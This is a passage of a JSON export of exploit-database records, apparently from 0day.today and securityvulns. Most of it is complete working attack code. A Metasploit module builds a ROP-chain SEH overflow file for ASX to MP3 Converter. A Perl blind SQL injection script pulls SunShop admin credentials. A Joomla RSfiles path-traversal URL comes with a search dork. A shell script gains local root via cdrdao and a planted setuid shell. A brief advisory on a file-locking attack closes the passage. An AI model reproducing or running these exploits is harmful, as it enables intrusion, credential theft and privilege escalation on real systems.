to be subtracted, to point to the VirtualProtect() function.\r\n# If \"ASLR\" is false, \"VPOffset\" will be treated as the direct,\r\n# non-negged address to VirtualProtect() in Kernel32.dll.\r\n# Code:\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Mini-Stream Software ASX to MP3 Converter v3.1.2.1 SEH Buffer Overflow.',\r\n 'Description' => %q{\r\n This module exploits a SEH-based buffer overflow in ASX to MP3 Converter\r\n v.3.1.2.1. An attacker must send the file to victim, and the victim must open\r\n the specially crafted M3U file. This exploit is written with ROP gadgets from\r\n MSA2Mfilter03.dll and bypasses DEP on all systems including ASLR on Vista.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'Node' ],\r\n 'Version' => '$Revision: 99999 $',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1000,\r\n 'BadChars' => \"\\x00\\x0a\\x0d\",\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows Vista Ultimate SP1 Eng x86', \r\n {'Offset' => 43511,\r\n 'Offset2' => 16339,\r\n 'K32Offset' => 0xfffebcac,\r\n 'VPOffset' => 0xfffe4e9c,\r\n 'ASLR' => true } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows Vista Ultimate SP2 Eng x86', \r\n {'Offset' => 43511,\r\n 'Offset2' => 16339,\r\n 'K32Offset' => 0xfffebcac,\r\n 'VPOffset' => 0xfffe5bf0,\r\n 'ASLR' => true } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP3 Eng x86', \r\n {'Offset' => 43484,\r\n 'Offset2' => 16312,\r\n 'VPOffset' => 0x7c801ad4,\r\n 'ASLR' => false } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP2 Swe x86', \r\n {'Offset' => 43476,\r\n 'Offset2' => 16304,\r\n 'VPOffset' => 0x7c801ad0,\r\n 'ASLR' => false } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP3 Swe x86', \r\n {'Offset' => 43491,\r\n 'Offset2' => 16319,\r\n 'VPOffset' => 0x7c801ad4,\r\n 'ASLR' => false } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Home SP3 Swe x86', \r\n {'Offset' => 43476,\r\n 'Offset2' => 16304,\r\n 'VPOffset' => 0x7c801ad4,\r\n 'ASLR' => false } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => '',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ true, 'The file name.', 'asx2mp3.m3u']),\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n \r\n rop = [0x1002F7B7].pack('V') # PUSH ESP # AND AL,0C # NEG EDX # NEG EAX # SBB EDX,0 # POP EBX # RETN 10\r\n rop << [0x10023315].pack('V') # ADD ESP,20 # RETN \r\n rop << \"1111\" # VirtualProtect() placeholder\r\n rop << \"2222\" #return address placeholder\r\n rop << \"3333\" #lpAddress placeholder\r\n rop << \"4444\" #dwsize placeholder\r\n rop << \"5555\" #flNewProtect placeholder\r\n rop << [0x10066005].pack('V') # lpflOldProtect writable address\r\n rop << \"A\" * 8\r\n rop << \"A\" * 16 # because of RETN 10\r\n rop << [0x1002991C].pack('V') # XOR EDX,EDX # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << \"A\" * 16\r\n \r\n \r\n if target['ASLR'] == true\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << [target['K32Offset']].pack('V')\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x1002C86A].pack('V') # SUB EAX,ECX # RETN\r\n rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n end\r\n \r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x10014548].pack('V') # XOR EAX,EAX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << \"A\" * 16\r\n \r\n rop << [target['VPOffset']].pack('V')\r\n \r\n if target['ASLR'] == true\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP #POP EBX # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN\r\n rop << [0x1002C86A].pack('V') # SUB EAX,ECX # RETN\r\n end\r\n \r\n rop << [0x10019AA7].pack('V') # MOV DWORD PTR DS:[EDX],EAX # POP EDI # XOR EAX,EAX # POP EBP # ADD ESP,40 # RETN\r\n rop << \"A\" * 8\r\n rop << \"A\" * 64\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << [0xffff95c8].pack('V') # negged shellcode offset\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x1001451E].pack('V') # ADD EAX,ECX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << \"A\" * 16 \r\n rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << \"A\" * 16\r\n rop << [0xfffffc18].pack('V') # 0x3e8(1000].pack('V') negged\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << \"A\" * 16\r\n rop << [0xffffffc0].pack('V') # 0x40 negged\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << \"A\" * 16\r\n rop << [0x1002FE81].pack('V') # XCHG EAX,ESP # RETN\r\n \r\n junk = rand_text_alpha_upper(target['Offset2']) #needed because of ADD ESP,4404 # RETN\r\n junktoseh = rand_text_alpha_upper(target['Offset'] - junk.length - rop.length)\r\n seh = [0x100177EA].pack('V') #ADD ESP,4404 # RETN\r\n nops = \"\\x90\" * 24\r\n shellspace = rand_text_alpha_upper(1000 - payload.encoded.length)\r\n m3ufile = junk + rop + junktoseh + seh + nops + payload.encoded + shellspace\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n file_create(m3ufile)\r\n \r\n end\r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13319"}, {"lastseen": "2018-01-05T19:04:49", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-08-25T00:00:00", "published": "2007-08-25T00:00:00", "id": "1337DAY-ID-2086", "href": "https://0day.today/exploit/description/2086", "type": "zdt", "title": "SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit", "sourceData": "============================================================\r\nSunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit\r\n============================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse Getopt::Long;\r\n\r\nif(!$ARGV[1])\r\n{\r\n print \"\\n \\\\#'#/ \";\r\n print \"\\n (-.-) \";\r\n print \"\\n -----------------oOO---(_)---OOo------------------\";\r\n print \"\\n | SunShop v4.0 RC 6 (search) Blind SQL Injection |\";\r\n print \"\\n | k1tk4t - Indonesia |\";\r\n print \"\\n | coded by DNX |\";\r\n print \"\\n --------------------------------------------------\";\r\n print \"\\n[!] Vendor: http://www.turnkeywebtools.com\";\r\n print \"\\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter\";\r\n print \"\\n[!] Solution: install v4.0.1\";\r\n print \"\\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>\";\r\n print \"\\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins\";\r\n print \"\\n[!] Options:\";\r\n print \"\\n -i [no] Valid User-ID, default is 1\";\r\n print \"\\n -c [no] Valid Category-ID with products, default is 1\";\r\n print \"\\n -o [no] 1 = get username (default)\";\r\n print \"\\n 2 = get password\";\r\n print \"\\n -t [name] Changes the admin table name, default is admins\";\r\n print \"\\n -p [ip:port] Proxy support\";\r\n print \"\\n\";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy $user = 1;\r\nmy $cat = 1;\r\nmy $column = \"username\";\r\nmy $table = \"admins\";\r\nmy %options = ();\r\nGetOptions(\\%options, \"i=i\", \"c=i\", \"o=i\", \"t=s\", \"p=s\");\r\n\r\nprint \"[!] Exploiting...\\n\";\r\n\r\nif($options{\"i\"}) { $user = $options{\"i\"}; }\r\nif($options{\"c\"}) { $cat = $options{\"c\"}; }\r\nif($options{\"o\"} && $options{\"o\"} == 2) { $column = \"password\"; }\r\nif($options{\"t\"}) { $table = $options{\"t\"}; }\r\n\r\nsyswrite(STDOUT, \"data:\", 5);\r\n\r\nfor(my $i = 1; $i <= 32; $i++)\r\n{\r\n my $found = 0;\r\n my $h = 48;\r\n while(!$found && $h <= 57)\r\n {\r\n if(istrue2($host, $path, $table, $user, $i, $h))\r\n {\r\n $found = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n if(!$found)\r\n {\r\n $h = 97;\r\n while(!$found && $h <= 122)\r\n {\r\n if(istrue2($host, $path, $table, $user, $i, $h))\r\n {\r\n $found = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n }\r\n}\r\n\r\nprint \"\\n[!] Exploit done\\n\";\r\n\r\nsub istrue2\r\n{\r\n my $host = shift;\r\n my $path = shift;\r\n my $table = shift;\r\n my $uid = shift;\r\n my $i = shift;\r\n my $h = shift;\r\n\r\n my $ua = LWP::UserAgent->new;\r\n my $url = \"http://\".$host.$path.\"index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=\".$cat.\")%20AND%20SUBSTRING((SELECT%20\".$column.\"%20FROM%20\".$table.\"%20WHERE%20id=\".$uid.\"),\".$i.\",1)=CHAR(\".$h.\")/*\";\r\n\r\n if($options{\"p\"})\r\n {\r\n $ua->proxy('http', \"http://\".$options{\"p\"});\r\n }\r\n\r\n my $response = $ua->get($url);\r\n my $content = $response->content;\r\n my $regexp = \"Add To Cart\";\r\n\r\n if($content =~ /$regexp/)\r\n {\r\n return 1;\r\n }\r\n else\r\n {\r\n return 0;\r\n }\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2086"}, {"lastseen": "2018-04-11T11:50:46", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-08-23T00:00:00", "published": "2007-08-23T00:00:00", "id": "1337DAY-ID-2082", "href": "https://0day.today/exploit/description/2082", "type": "zdt", "title": "Joomla Component RSfiles <= 1.0.2 (path) File Download Vulnerability", "sourceData": "====================================================================\r\nJoomla Component RSfiles <= 1.0.2 (path) File Download Vulnerability\r\n====================================================================\r\n\r\n\r\n\r\n*******************************************************************************\r\n# Title : Joomla Component RSfiles <= 1.0.2 (path) Remote File Download Vulnerability\r\n# Author : ajann\r\n# Contact : :(\r\n# S.Page : http://www.rsjoomla.com\r\n# $$ : 10 $\r\n# Dork : inurl:\"/index.php?option=com_rsfiles\"\r\n# DorkEx : http://www.google.com.tr/search?hl=tr&q=inurl%3A%22%2Findex.php%3Foption%3Dcom_rsfiles%22&btnG=Ara&meta=\r\n\r\n*******************************************************************************\r\n\r\n[[Remote File]]]---------------------------------------------------------\r\n\r\nhttp://[target]/[path]//index.php?option=com_rsfiles&task=files.display&path=[File]\r\n\r\nExample:\r\n\r\n//index.php?option=com_rsfiles&task=files.display&path=..|index.php\r\n//index.php?option=com_rsfiles&task=files.display&path=..|..| etc..\r\n\r\n[[/Remote File]]\r\n\r\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n# ajann,Turkey\r\n# ...\r\n\r\n# Im not Hacker!\r\n\r\n\r\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2082"}, {"lastseen": "2018-01-27T01:08:57", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2004-09-07T00:00:00", "published": "2004-09-07T00:00:00", "id": "1337DAY-ID-7357", "href": "https://0day.today/exploit/description/7357", "type": "zdt", "title": "CDRDAO Local Root Exploit", "sourceData": "=========================\r\nCDRDAO Local Root Exploit\r\n=========================\r\n\r\n\r\n#!/bin/sh\r\nDIR=`pwd`\r\necho \"\"\r\necho \"cdrdao local root exploit - gr doesn't protect you this time\"\r\necho \"Karol Wi?sek <appelast*drumnbass.art.pl>\"\r\necho \"\"\r\nsleep 2\r\numask 000\r\necho -n \"[*] Checking if /etc/ld.so.preload doesn't exist ... \"\r\nif [ -f /etc/ld.so.preload ]; then\r\necho \"WRONG\"\r\necho \"/etc/ld.so.preload exists, write another exploit ;P\"\r\nexit\r\nelse\r\necho \"OK\"\r\nfi\r\necho -n \"[*] Checking if su is setuid ... \"\r\nif [ -u /bin/su ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\necho -n \"[*] Creating evil *uid() library ... \"\r\ncat > getuid_lib.c << _EOF\r\nint getuid(void) {\r\nreturn 0; }\r\n_EOF\r\ngcc -o getuid_lib.o -c getuid_lib.c\r\nld -shared -o getuid_lib.so getuid_lib.o\r\nrm -f getuid_lib.c getuid_lib.o\r\nif [ -f ./getuid_lib.so ]; then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nfi\r\necho -n \"[*] Creating suidshell ... \"\r\ncat > suid.c << _EOF\r\nint main(void) {\r\nsetgid(0); setuid(0);\r\nunlink(\"./suid\");\r\nexecl(\"/bin/sh\",\"sh\",0); }\r\n_EOF\r\ngcc -o suid suid.c\r\nrm -f suid.c\r\nif [ -x ./suid ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\necho -n \"[*] Exploiting cdrdao ... \"\r\nln -sf /etc/ld.so.preload $HOME/.cdrdao\r\nif [ ! -L $HOME/.cdrdao ];then\r\necho \"Could'n link to \\$HOME/.cdrdao\"\r\nexit\r\nfi\r\ncdrdao unlock --save 2>/dev/null\r\n>/etc/ld.so.preload\r\necho \"$DIR/getuid_lib.so\" > /etc/ld.so.preload\r\nsu - -c \"rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid\"\r\nif [ -s ./suid ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\nrm -f getuid_lib.so\r\nunlink $HOME/.cdrdao\r\necho \"Entering rootshell ... ;]\"\r\n./suid\r\n\r\n\r\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7357"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "During file operations conditions exist for attacker to gain access to content of protected or locked files. It's also possible to create unmanageble file.", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:VULN:7357", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7357", "title": "Microsoft Windows files and folders management problems", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "\r\nHello lists, hello Roger. It's me again.\r\n\r\nSorry for annoyance, but there is one more attack vector with pre-open\r\nfiles I meant, but forgot to mention. It seems dangerous enough and need\r\nto be investigated for different applications. Attack is against\r\napplication relying on mandatory locks.\r\n\r\nAttack scenario:\r\n\r\n1. Alice pre-opens some Document and awaits Bob to open it. Document is\r\nsafe to open (text file, video file, business application format, etc).\r\nAlso, like in case of Microsoft Word it can be temporary file.\r\n2. Bob opens Document with some Application.\r\n3. Application locks file and reads or writes some data\r\n4. Alice modifies data\r\n5. Application reads previously accessed data. Because application\r\nrelies on the fact data can not be modified in locked file, this data is\r\nnot validated. It can lead to the problems like buffer overflows and to\r\nability to modify execution flow and to arbitrary code execution.\r\n\r\nWhat can be instead of Application? Any application to process user\r\nsupplied file which locks this file during processing.\r\n\r\nExamples are: Microsoft Office applications, video/audio players, etc. I\r\nexpect huge number of applications are vulnerable and will be grateful\r\nto everyone who can help me to find this kind of vulnerabilities\r\nin-the-wild, because this kind of vulnerability is not trivial and hard\r\nto catch without source code analysis.\r\n\r\n-- \r\nhttp://securityvulns.com/\r\n /\_/\\r\n { , . } |\\r\n+--oQQo->{ ^ }<-----+ \\r\n| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)\r\n+-------------o66o--+ /\r\n |/", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:DOC:16304", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16304", "title": "Pre-open files attack agains locked file", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
